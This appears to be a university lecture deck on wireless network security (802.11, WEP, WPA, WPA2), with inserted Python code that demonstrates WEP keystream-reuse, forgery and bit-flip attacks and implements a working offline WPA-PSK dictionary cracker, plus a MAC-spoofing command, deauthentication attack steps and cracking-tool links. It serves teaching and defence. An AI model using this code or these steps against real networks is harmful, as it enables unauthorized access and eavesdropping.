5169 wireless network security aminek
7/29/2019 5169 Wireless Network Security AmineK
1/47
Wireless Networks and Mobile Computing (CSI 5169)
Wireless Network Security
Amine Khalife
Outline
1. Wireless intro & history
2. Wireless network modes
3. SSID
4. WEP
5. WPA
6. WPA2
7. Wireless Network tools
8. References
Background & Overview: History
Developed for military use
Security concerns widely noticed after Peter Shipley's 2001 DefCon presentation on war driving
DHS labeled Wi-Fi a terrorist threat and demanded regulation
Non-Wi-Fi wireless types:
  CDPD: 19.2 kbps, analog
  GPRS: 171.2 kbps, digital
  WAP: bandwidth-efficient content delivery
  Ricochet: 176 kbps wireless broadband, a commercial flop
  Bluetooth: personal area networks, range limited only by transmit power
  Blackberry: uses cellular & PCS networks, no authentication at the console
IEEE 802 series standards:
  802.11: wireless LANs
  802.15: wireless personal area networks (e.g., Bluetooth)
  802.16: wireless broadband up to 155 Mbps, wireless ISPs
802.11 Standards
802.11a: 54 Mbps @ 5 GHz
  Not interoperable with 802.11b
  Limited distance
  Dual-mode APs require 2 chipsets and look like two APs to clients
  Cisco products: Aironet 1200
802.11b: 11 Mbps @ 2.4 GHz
  Full speed up to 300 feet, coverage up to 1750 feet
  Cisco products: Aironet 340, 350, 1100, 1200
802.11g: 54 Mbps @ 2.4 GHz
  Same range as 802.11b
  Backward-compatible with 802.11b; speeds are slower in dual (b/g) mode
  Cisco products: Aironet 1100, 1200
802.11 Standards (Cont.)
802.11e: QoS, dubbed Wireless MultiMedia (WMM) by the Wi-Fi Alliance
802.11i: Security
  Adds AES encryption (CCMP)
  AES needs more CPU, so new chips were required; TKIP is the interim solution for existing RC4 hardware
802.11n (2009): up to 300 Mbps, 5 GHz and/or 2.4 GHz, ~230 ft range
802.11ac (under development when this deck was written; ratified in December 2013): high throughput in the 5 GHz band
  Uses wider RF channels; targets multi-station WLAN throughput of at least 1 Gbps and a maximum single-link throughput of at least 500 Mbps
Wireless Network Modes
802.11 wireless networks operate in two basic modes:
1. Infrastructure mode
2. Ad-hoc mode
Infrastructure mode:
  Each wireless client connects directly to a central device called an Access Point (AP)
  No direct connection between wireless clients
  The AP acts as a wireless hub that sets up and handles the connections between wireless clients
Wireless Network Modes (contd)
The AP (hub) handles:
  client authentication
  authorization
  link-level data security (access control and enabling data traffic encryption)
Ad-hoc mode:
  Each wireless client connects directly to the others
  No central device manages the connections
  Rapid deployment of a temporary network where no infrastructure exists (an advantage after a disaster)
  Each node must maintain its own authentication list
SSID - Service Set Identifier
Identifies a particular wireless network
A client must be configured with the same SSID as the AP to join that network
Without the SSID, the client cannot select and join a wireless network
Hiding the SSID is not a security measure: the wireless network is not invisible, the AP keeps beaconing
The SSID can be recovered by an intruder sniffing it from any probe response or association request that carries it
SSID (Contd)
SSID hiding is mostly a way for vendors to make more money
It is easy to find the ID of a hidden network: beacon broadcasting cannot be turned off, the AP only blanks the SSID field of the beacon, and the real SSID still appears in cleartext in probe responses and association requests
Simply use a utility that shows all the current networks:
  inSSIDer
  NetStumbler
  Kismet
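To see what a "hidden" SSID actually looks like on the air, here is an added example (not code from the original slides) that parses the tagged parameters of 802.11 beacon and probe-response frame bodies, the same structures tools like Kismet read. Both frame bodies are constructed inline for this example; the SSID "CorpWiFi", the channel, the timestamp and the capability bits are made-up values.

```python
import struct
from typing import List, Optional, Tuple

# 802.11 information element IDs (IEEE Std 802.11-2007, clause 7.3.2)
IE_SSID = 0
IE_SUPPORTED_RATES = 1
IE_DS_PARAMS = 3
FIXED_FIELDS_LEN = 12  # beacon / probe response: timestamp(8) + interval(2) + capability(2)


def parse_ies(tagged: bytes) -> List[Tuple[int, bytes]]:
    """Split the tagged-parameter area into (element_id, data) pairs.
    Stops at the first element that claims more bytes than remain, so a
    truncated or malicious frame cannot make the parser read past the buffer."""
    ies = []
    i = 0
    while i + 2 <= len(tagged):
        eid, length = tagged[i], tagged[i + 1]
        data = tagged[i + 2:i + 2 + length]
        if len(data) < length:
            break
        ies.append((eid, data))
        i += 2 + length
    return ies


def ssid_from_mgmt_body(body: bytes) -> Optional[str]:
    """Return the SSID of a beacon/probe-response body: '' when the AP is
    'hiding' it (zero-length or all-NUL SSID element), None if absent."""
    for eid, data in parse_ies(body[FIXED_FIELDS_LEN:]):
        if eid == IE_SSID:
            if len(data) == 0 or data == b"\x00" * len(data):
                return ""
            return data.decode("utf-8", errors="replace")
    return None


def build_mgmt_body(ssid: bytes, channel: int) -> bytes:
    """Constructed beacon/probe-response body for this example only.
    Capability 0x0411 = ESS + Privacy + short slot time."""
    fixed = struct.pack("<QHH", 0x1234567890, 100, 0x0411)
    ies = bytes([IE_SSID, len(ssid)]) + ssid
    ies += bytes([IE_SUPPORTED_RATES, 4]) + bytes([0x82, 0x84, 0x8B, 0x96])
    ies += bytes([IE_DS_PARAMS, 1, channel])
    return fixed + ies


# The same AP cloaks its SSID in beacons but must answer a directed probe
# request with the real name, which is exactly what a sniffer waits for.
HIDDEN_BEACON = build_mgmt_body(b"", 6)
PROBE_RESPONSE = build_mgmt_body(b"CorpWiFi", 6)


def classify(body: bytes) -> str:
    ssid = ssid_from_mgmt_body(body)
    if ssid is None:
        return "no SSID element"
    if ssid == "":
        return "cloaked SSID (AP is still beaconing)"
    return "SSID revealed: " + ssid


if __name__ == "__main__":
    print("beacon        :", classify(HIDDEN_BEACON))
    print("probe response:", classify(PROBE_RESPONSE))
```

The parser keeps the length check because management frames are unauthenticated input: a sniffer that trusts the element length field can be crashed by a crafted beacon long before it finds any SSID.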
IEEE 802.11 Security - Access control list
Access control list (MAC filtering)
  Simplest security measure
  Filters out unknown users
  Requires a list of authorized clients' MAC addresses to be loaded in the AP
  Does not protect each wireless client, nor the confidentiality and integrity of the traffic ===> vulnerable
  MAC addresses are sent in the clear in every frame, so an attacker sniffs an authorized address and copies it
Defeated by MAC spoofing:
  ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux)
  SMAC - KLC Consulting (Windows)
  MAC Makeup - H&C Works (Windows)
WEP - Wired Equivalent Privacy
The original native security mechanism for WLANs, part of the 1997 802.11 standard
Provides security on an 802.11 network
Protects wireless communication from eavesdropping (confidentiality)
Prevents unauthorized access to the wireless network (access control)
Prevents tampering with transmitted messages (integrity)
Goal: give users the level of privacy inherent in a wired network
WEP
1. Appends a 32-bit CRC checksum (the ICV) to each outgoing frame (INTEGRITY)
2. Encrypts the frame using the RC4 stream cipher with a 40-bit (standard) or 104-bit (enhanced) shared key plus a 24-bit initialization vector (IV) chosen per frame (CONFIDENTIALITY)
3. The IV concatenated with the default key configured on the station/access point (seed = IV || key, 64 or 128 bits in total) is used to create the RC4 key stream
4. The key stream is XORed with the plaintext message plus ICV to produce the WEP-encrypted frame; the IV is sent in the clear in front of it
Encrypted WEP frame (figure)
RC4 keystream XORed with plaintext (figure)
WEP Components
Initialization Vector (IV): dynamic 24-bit value
  Chosen by the transmitting wireless network interface (randomly or, in many implementations, from a counter)
  2^24 = 16,777,216 possible IVs
Shared Secret Key:
  40 bits long (5 ASCII characters) when a "64-bit" key is used
  104 bits long (13 ASCII characters) when a "128-bit" key is used
  (the advertised key size counts the 24-bit IV)
WEP Components (contd)
The RC4 algorithm consists of 2 main parts:
1. The Key Scheduling Algorithm (KSA):
  Creates a scrambled 256-byte state array from the key (IV || secret key)
  This state array is used as input to the second phase, the PRGA
2. The Pseudo-Random Generation Algorithm (PRGA):
  Uses the state array from the KSA to generate the final key stream
  Each byte of the key stream is XORed with the corresponding plaintext byte to produce the ciphertext
WEP Components (contd)
ICV (Integrity Check Value) = CRC-32 (cyclic redundancy check) integrity check
XOR operation, denoted as ⊕:
  plain-text ⊕ keystream = cipher-text
  cipher-text ⊕ keystream = plain-text
  plain-text ⊕ cipher-text = keystream
How WEP works
[Figure: the IV and the RC4 key seed the keystream; the original unencrypted packet plus its checksum is XORed with the keystream; the output is the IV followed by the encrypted packet.]
Encryption Process (figure)
Decryption Process (figure)
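The encryption and decryption processes above, implemented end to end as an added example (not code from the original slides). RC4 is written out in its KSA and PRGA halves; the 40-bit key, the IV and the plaintext are constructed values; the ICV is serialized little-endian here, which is an assumption, since the byte order is an implementation detail the slides do not cover.

```python
import os
import zlib
from typing import List, Optional


def rc4_ksa(key: bytes) -> List[int]:
    """Key Scheduling Algorithm: scramble the identity permutation with the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Pseudo-Random Generation Algorithm: walk the state array to emit n bytes."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is its own inverse: the same call encrypts and decrypts."""
    return xor(data, rc4_keystream(key, len(data)))


def icv(plaintext: bytes) -> bytes:
    """Integrity Check Value = CRC-32 of the plaintext (little-endian, an assumption)."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(key: bytes, plaintext: bytes, iv: Optional[bytes] = None) -> bytes:
    """WEP encapsulation: seed RC4 with IV || key (24 + 40/104 bits) and
    return IV || RC4(plaintext || ICV).  The IV travels in the clear."""
    if len(key) not in (5, 13):
        raise ValueError("WEP keys are 40 or 104 bits (5 or 13 bytes)")
    if iv is None:
        iv = os.urandom(3)          # the transmitter's per-frame IV choice
    if len(iv) != 3:
        raise ValueError("IV is 24 bits")
    return iv + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Reverse the process and verify the ICV; raises on corruption or wrong key."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + key, body)
    plaintext, received_icv = clear[:-4], clear[-4:]
    if icv(plaintext) != received_icv:
        raise ValueError("ICV mismatch: frame corrupted, forged or wrong key")
    return plaintext


def icv_valid(key: bytes, frame: bytes) -> bool:
    """Receiver's accept/drop decision for a frame."""
    try:
        wep_decrypt(key, frame)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key = bytes.fromhex("0a1b2c3d4e")                 # constructed 40-bit key
    frame = wep_encrypt(key, b"hello, station", iv=b"\x01\x02\x03")
    print("IV       :", frame[:3].hex())
    print("encrypted:", frame[3:].hex())
    print("decrypted:", wep_decrypt(key, frame))
```

Note what the seed construction implies: for one shared key, the keystream depends only on the 24-bit IV, so two frames carrying the same IV are encrypted with byte-for-byte the same keystream.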
WEP Authentication (shared key)
1. The station sends an authentication request to the AP
2. The AP sends a challenge text (128 bytes) to the station
3. The station uses its configured 64-bit or 128-bit default key to WEP-encrypt the challenge text and sends the result to the AP
4. The AP decrypts the encrypted text using its configured WEP key that corresponds to the station's default key
5. The AP compares the decrypted text with the original challenge text
6. If they match, the access point and the station share the same WEP key, and the access point authenticates the station
7. The station connects to the network
WEP Authentication (Contd)
There is a well-documented vulnerability in shared-key authentication (SKA).
The authentication process leaks information about the key stream.
The keystream used for the handshake can be derived by capturing the challenge frames of a Shared Key authentication, so SKA is regarded as insecure.
The problem is that a monitoring attacker observes both the plaintext challenge and the encrypted response to it.
XORing the two gives the RC4 keystream (for that IV) used to encrypt the response.
The attacker can then reuse that keystream, with the same IV, to encrypt any challenge he receives in the future and authenticate without ever knowing the key.
WEP flaws and vulnerabilities
Weak keys:
  RC4 has weak keys: for certain IV values the first keystream bytes reveal bytes of the secret key (the Fluhrer-Mantin-Shamir attack)
  This allows an attacker to recover the default key being used by the Access Point and client stations
  This enables the attacker to decrypt all messages sent over the encrypted channel
IV reuse and small size:
  There are only 2^24 different IVs
  On a busy network an IV will surely be reused (after at most 2^24 frames, and by the birthday bound much sooner); if the default key has not been changed, the two frames share a keystream and the original messages can be retrieved relatively easily
WEP flaws and vulnerabilities (contd)
With IV reuse it is possible to determine keystreams, which lets an attacker decrypt and forge packets and so gain access to the WLAN.
A 40-bit WEP key needs more protection from attacks than a 104-bit ("128-bit") key, but the attacks above do not depend on key length: both are very weak and unable to secure Wi-Fi networks.
Uses a weak authentication algorithm
Uses a weak data encapsulation method
Uses an improper integrity algorithm, CRC-32, which is linear: an attacker can flip bits in the ciphertext and fix up the ICV without knowing the key
Lacks mutual authentication and key management (one static key shared by everyone)
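The three keystream-reuse problems described above (the shared-key authentication leak, IV reuse between two frames, and the linear CRC-32 ICV) worked through on constructed captures, as an added example that is not part of the original slides. None of these attacks needs RC4 itself, only the fact that one keystream is used twice, so KEYSTREAM below is a fixed, constructed byte string standing in for RC4(IV || key) under one IV; the plaintexts, the 128-byte challenge and the little-endian ICV encoding are likewise assumptions for the example.

```python
import zlib


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, little-endian here (an assumption)."""
    return zlib.crc32(data).to_bytes(4, "little")


# Stand-in for RC4(IV || key) for ONE fixed IV.  The attacks below never need
# RC4, only the fact that this keystream is reused, so the bytes are a
# constructed, reproducible sequence rather than real cipher output.
KEYSTREAM = bytes((i * 73 + 41) & 0xFF for i in range(160))


def wep_body(plaintext: bytes) -> bytes:
    """What the victim transmits after the IV: (plaintext || ICV) XOR keystream."""
    return xor(plaintext + icv(plaintext), KEYSTREAM)


def ap_accepts(body: bytes) -> bool:
    """The receiver's check: strip the keystream, verify the ICV."""
    clear = xor(body, KEYSTREAM)
    return icv(clear[:-4]) == clear[-4:]


# 1. Shared-key authentication: the challenge goes out in the clear and the
#    response is WEP(challenge), so their XOR is keystream for that IV.
def keystream_from_auth(challenge: bytes, encrypted_response: bytes) -> bytes:
    return xor(challenge + icv(challenge), encrypted_response)


def forge_auth_response(keystream: bytes, new_challenge: bytes) -> bytes:
    """Answer a later challenge without the key by reusing the keystream
    (the attacker also puts the same IV in the frame header)."""
    return xor(new_challenge + icv(new_challenge), keystream)


# 2. IV reuse: c1 XOR c2 = p1 XOR p2, so one known plaintext reveals the other.
def recover_plaintext(c_known: bytes, p_known: bytes, c_target: bytes) -> bytes:
    """Assumes the known frame is at least as long as the target frame."""
    return xor(xor(c_known, c_target), p_known + icv(p_known))[:-4]


# 3. CRC-32 is linear: crc(p XOR d) = crc(p) XOR crc(d) XOR crc(0^n), so the
#    ICV fix-up for a change d depends only on d, never on the unknown p.
def bitflip(body: bytes, delta: bytes) -> bytes:
    n = len(body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole payload (pad with zeros)")
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(b"\x00" * n)).to_bytes(4, "little")
    return xor(body, delta + icv_delta)


if __name__ == "__main__":
    challenge = bytes(range(128))                 # SKA challenge text is 128 bytes
    ks = keystream_from_auth(challenge, wep_body(challenge))
    print("forged auth accepted:", ap_accepts(forge_auth_response(ks, bytes(128))))
    p1, p2 = b"known plaintext frame", b"hidden secret payload"
    print("recovered:", recover_plaintext(wep_body(p1), p1, wep_body(p2)))
    body = wep_body(b"pay alice 0010 dollars")
    # the attacker only needs to know which bytes to change, not the rest
    delta = b"\x00" * 10 + xor(b"0010", b"9999") + b"\x00" * 8
    print("bit-flipped frame accepted:", ap_accepts(bitflip(body, delta)))
```

The bit-flip step is the one to remember when evaluating any protocol: a checksum that is linear over XOR (CRC, plain parity) gives no integrity against an active attacker, whatever the cipher around it; only a keyed MAC does.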
Attacks on WEP
WEP-encrypted networks can be cracked in about 10 minutes
The goal is to collect enough IVs (that is, enough distinct keystreams) to recover the key
IV = Initialization Vector, a cleartext value prepended to the key so that the same key does not produce the same keystream for every frame
Injecting packets makes the AP and clients generate new IVs far faster than passive sniffing
Attacks on WEP (contd)
BackTrack 5 (released 1st March 2012)
  Tutorial is available
  All required tools on a bootable Linux CD + laptop + wireless card (one whose driver supports monitor mode and packet injection)
WEP cracking example (figure: screenshot)
WPA - Wi-Fi Protected Access
New technique in 2002 (Wi-Fi Alliance), a stop-gap replacement for the flawed WEP
Improved data encryption
Strong user authentication (802.1X/EAP in Enterprise mode, a pre-shared key in Personal mode)
Because of the many attacks on WEP's single static key, WPA derives a fresh per-packet key for each frame transmitted (TKIP key mixing) instead of reusing one shared secret
Keeps the RC4 algorithm (so it runs on existing hardware) but uses it properly: the per-packet key changes before enough traffic under one key can accumulate for an attacker to recover it
WPA
Data is encrypted using the RC4 stream cipher, with a 128-bit key and a 48-bit initialization vector (IV).
One major improvement in WPA over WEP is the Temporal Key Integrity Protocol (TKIP), which dynamically changes keys as the system is used.
When combined with the much larger IV, this defeats the well-known key recovery attacks on WEP.
WPA also provides vastly improved payload integrity.
WPA
A more secure message authentication code (usually known as a MAC, but here termed a MIC for "Message Integrity Code") is used in WPA, an algorithm named "Michael".
The MIC used in WPA includes a frame counter (the TKIP sequence counter), which prevents replay attacks.
Michael is deliberately lightweight so that it still runs on most older network cards; it is not a cryptographically strong MAC (roughly 20 bits of security), which is why WPA pairs it with countermeasures.
WPA includes a special countermeasure mechanism that detects an attempt to break TKIP (two MIC failures within 60 seconds), temporarily shuts down TKIP communications for 60 seconds and then re-keys.
How WPA Addresses the WEP Vulnerabilities
WPA wraps the RC4 cipher engine in four new algorithms:
1. Extended 48-bit IV (the TKIP sequence counter) and IV sequencing rules
  2^48 is a large number, about 281 trillion, so the IV never repeats under one key
  Sequencing rules specify how IVs are selected and verified (a receiver drops out-of-order frames, which stops replay)
2. A Message Integrity Code (MIC) called Michael
  Designed for already deployed hardware
  Requires the use of active countermeasures
3. Key derivation and distribution
  The initial random-number (nonce) exchange of the 4-way handshake defeats man-in-the-middle attacks and derives fresh session keys
4. Temporal Key Integrity Protocol generates per-packet keys
WPA2 - Wi-Fi Protected Access 2
Based on the IEEE 802.11i standard
2 versions: Personal & Enterprise
The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm
WPA2 encryption uses AES (CCMP, mandatory); TKIP is only allowed for backward compatibility with WPA devices
Personal mode uses a PSK (pre-shared key) and does not require separate authentication of users
Enterprise mode requires users to be separately authenticated using the EAP protocol (802.1X with a RADIUS server)
WPA2
WPA2 uses AES with a key length of 128 bits to encrypt the data
AES is used in the Counter Mode with CBC-MAC Protocol (CCMP)
CCMP uses the same key for both encryption (AES counter mode) and authentication (AES CBC-MAC), but with different nonce/counter formatting for the two operations
WPA2
WPA2 is immune to many types of attacks that break WEP:
  Man-in-the-middle
  Authentication forging
  Replay
  Key collision
  Weak keys
  Packet forging
  Dictionary attacks (Enterprise mode; WPA2-PSK with a weak passphrase remains vulnerable to offline dictionary attacks)
WPA2 weaknesses
Cannot protect against session hijacking at higher layers
Cannot stop physical-layer attacks:
  RF jamming
  Data flooding
  Access point failure
Vulnerable to MAC address spoofing (e.g., forged deauthentication/disassociation frames, which are unauthenticated unless 802.11w management-frame protection is in use)
Am I secure if I use WPA-PSK?
WPA-PSK protected networks are vulnerable to offline dictionary attacks
Works against both WPA-PSK and WPA2-PSK (802.11i), because both derive the PMK from the passphrase the same way
New attack techniques have increased the speed of this attack: coWPAtty 4.6
  Run coWPAtty against captured packets to crack the key
  Needs the SSID to crack the WPA-PSK (it is the salt of the passphrase-to-PMK derivation), easily obtainable!
  Also supports WPA2-PSK cracking with the same pre-computed tables (valid only for the SSID they were computed for)
Attack steps:
  Spoof the MAC address of the AP and tell the client to disassociate (deauthenticate)
  Sniff the wireless network for the WPA-PSK 4-way handshake (EAPOL) as the client reconnects
  Try each candidate passphrase against the captured handshake offline
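The offline attack above, written out as an added example (not code from the original slides or from coWPAtty): passphrase to PMK with PBKDF2-HMAC-SHA1 salted by the SSID, PMK to PTK with the 802.11i PRF over the addresses and nonces visible in the handshake, then the EAPOL-Key MIC check that tells a right guess from a wrong one. The "captured" handshake is constructed inline: the SSID "CorpWiFi", the passphrase "dragon2012", the MAC addresses, the nonces and the EAPOL message 2 skeleton are made-up values, and the pmk_cache dict stands in for a pre-computed table.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# Offset of the 16-byte MIC inside an EAPOL-Key frame: EAPOL header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + key IV (16) + RSC (8) + key ID (8) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK as 802.11i specifies: PBKDF2-HMAC-SHA1, SSID as salt,
    4096 iterations, 256-bit output.  The SSID salt is why pre-computed
    tables only work for the SSID they were built for."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Every one of these inputs is visible in the sniffed 4-way handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    Key descriptor version 1 (TKIP) = HMAC-MD5, version 2 (CCMP) = HMAC-SHA1/128."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(hs: dict, wordlist: Iterable[str],
              pmk_cache: Optional[Dict[str, bytes]] = None) -> Optional[str]:
    """Offline dictionary attack on a captured handshake.  One PBKDF2 (the
    expensive part) per candidate, then a cheap PTK derivation and MIC check.
    pmk_cache plays the role of a pre-computed table for hs['ssid']."""
    if pmk_cache is None:
        pmk_cache = {}
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_cache.get(candidate)
        if pmk is None:
            pmk = pmk_cache[candidate] = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), captured_mic):
            return candidate
    return None


def build_capture(ssid: str, passphrase: str, version: int = 2) -> dict:
    """Constructed stand-in for a sniffed handshake: message 2/4 of the
    4-way handshake (the one carrying SNonce and the supplicant's MIC),
    with made-up MAC addresses and nonces."""
    aa, spa = bytes.fromhex("001122aabbcc"), bytes.fromhex("66778899ddee")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = (0x0108 | version).to_bytes(2, "big")   # pairwise + MIC bits + version
    eapol = (bytes([2, 3, 0, 95])                # EAPOL v2, type 3 (Key), length 95
             + b"\x02" + key_info + b"\x00\x10"   # RSN descriptor, key info, key length 16
             + b"\x00" * 7 + b"\x01"              # replay counter
             + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
             + b"\x00" * 16 + b"\x00\x00")        # MIC (zero for now), key data length
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol, version) + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "version": version}


CAPTURE = build_capture("CorpWiFi", "dragon2012")
WORDLIST = ["password", "12345678", "qwertyuiop", "dragon2012", "letmein!!"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(CAPTURE, WORDLIST))
```

Two things the code makes visible: the only expensive step is PBKDF2, so the attack is bounded by the attacker's hashing budget and the passphrase's guessability, not by anything the AP does; and a PMK table built for one SSID is useless against another, which is the whole value of a non-default SSID.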
WPA Cracking Example (figure: screenshot)
WEP vs WPA vs WPA2

                  WEP                               WPA                                WPA2
ENCRYPTION        RC4                               RC4 (TKIP)                         AES (CCMP)
KEY ROTATION      None                              Dynamic session keys               Dynamic session keys
KEY DISTRIBUTION  Manually typed into each device   Automatic distribution available   Automatic distribution available
AUTHENTICATION    Uses WEP key as authentication    Can use 802.1X & EAP               Can use 802.1X & EAP
Procedures to improve wireless security
Use a wireless intrusion prevention system (WIPS)
Enable WPA2 (PSK for home or small office, Enterprise with 802.1X where possible); never WEP or open
Use a good, long random passphrase (https://grc.com/password); a dictionary word falls to the offline attack
Use AES (CCMP); keep TKIP enabled only for legacy devices that cannot do AES, since it inherits RC4's and Michael's weaknesses
Use a unique, non-default SSID and change it every so often: the SSID salts the WPA-PSK derivation, so a unique one defeats pre-computed tables
Wireless network users should use or upgrade their network to the latest security standard released
Wireless Network tools
MAC spoofing
  http://aspoof.sourceforge.net/
  http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
  http://www.klcconsulting.net/smac/
WEP cracking tools
  http://www.backtrack-linux.org/
  http://www.remote-exploit.org/articles/backtrack/index.html
  http://wepattack.sourceforge.net/
  http://wepcrack.sourceforge.net/
Wireless analysers
  http://www.kismetwireless.net/
  http://www.netstumbler.com/
Questions
Q1) Given the cipher-text 11010110 and the plaintext 00110101, compute the keystream.
A1) cipher-text: 1 1 0 1 0 1 1 0
    plain-text:  0 0 1 1 0 1 0 1
    keystream:   1 1 1 0 0 0 1 1
Encrypting: plain-text ⊕ keystream = cipher-text
Decrypting: cipher-text ⊕ keystream = plain-text
Questions (Contd)
Q2) Why is SSID hiding (disabling the SSID broadcast) not 100% effective?
A2) Beacon broadcasting cannot be turned off, only the SSID field in the beacon is blanked, and attackers can still detect the SSID by sniffing other frames that carry it (probe responses, association requests) with wireless analysers.
Questions (Contd)
Q3) List 4 WEP vulnerabilities
A3)
1. The Initialization Vector (IV) is too small (24 bits)
2. The Integrity Check Value (ICV) algorithm, CRC-32, is not appropriate (linear and unkeyed)
3. WEP's use of RC4 is weak (the IV || key seeding exposes weak keys)
4. Authentication messages can be easily forged
REFERENCES
1. Hytnen, R., and Garcia, M. An Analysis of Wireless Security. 2006.
2. Whalen, S. Analysis of WEP and RC4 Algorithms. March 2002.
3. http://en.wikipedia.org/wiki/IEEE_802.1X
4. Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications. IEEE Std 802.11, June 2007.
5. http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
6. http://en.wikipedia.org/wiki/Advanced_Encryption_Standard
Thank You! Questions?